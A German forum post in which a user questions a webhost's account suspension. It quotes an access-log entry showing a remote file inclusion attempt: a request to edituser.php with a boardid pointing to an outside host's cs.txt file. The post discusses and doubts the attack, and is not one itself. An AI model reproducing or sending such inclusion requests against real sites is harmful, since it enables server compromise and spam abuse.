Jump to content

Merkwürdiges Security Issue


Recommended Posts

Ich möchte gern einmal eure Meinung hören zu dem folgenden Vorfall. Einer unserer Anwender hat eine Account Sperre seines Webspace hinnehmen müssen weil angeblich tausende Spam Mails verschickt wurden. Dazu gab es diese EMail des Webhosters, die ich beim ersten Lesen für vollkommenen Sinnlos halte:



In den access_log Ihres Accounts wurden folgende Einträge gefunden:


- - [05/Jul/2010:00:07:52 +0200] "GET /forum_d/edituser.php?boardid=http://amyru.h18.ru/images/cs.txt?

HTTP/1.1" 200 24187 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"



Folgende Skripte/Ordner wurden von uns per Chmod 000 gesperrt:


/tmp/.ICE


Bitte schalten Sie diese Skripte nicht einfach wieder frei, sondern prüfen mit

den Entwicklern, wie es zu diesen Sicherheitslücken innerhalb des Skriptes

kommen konnte. Ggf. verwenden Sie hier auch veralte Versionen mit bekannten

Sicherheitslücken.



Dazu habe ich zwei Argumente:

1. Ein solcher Angriff auf die edituser.php führt zu nichts, da dort die boardid sowieso nicht verabreitet wird.

2. Die Datei /tmp/.ICE hat mit dem Webuser garnichts zu tun, die gehört im Original zum X System.....

3. Vergleichbare Anfragen finden sich in allen access_logs, auch in meinen eigenen, das sind Bots die das Internet scannen und versuchen Einbruchsstellen ausfindig zu machen.

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...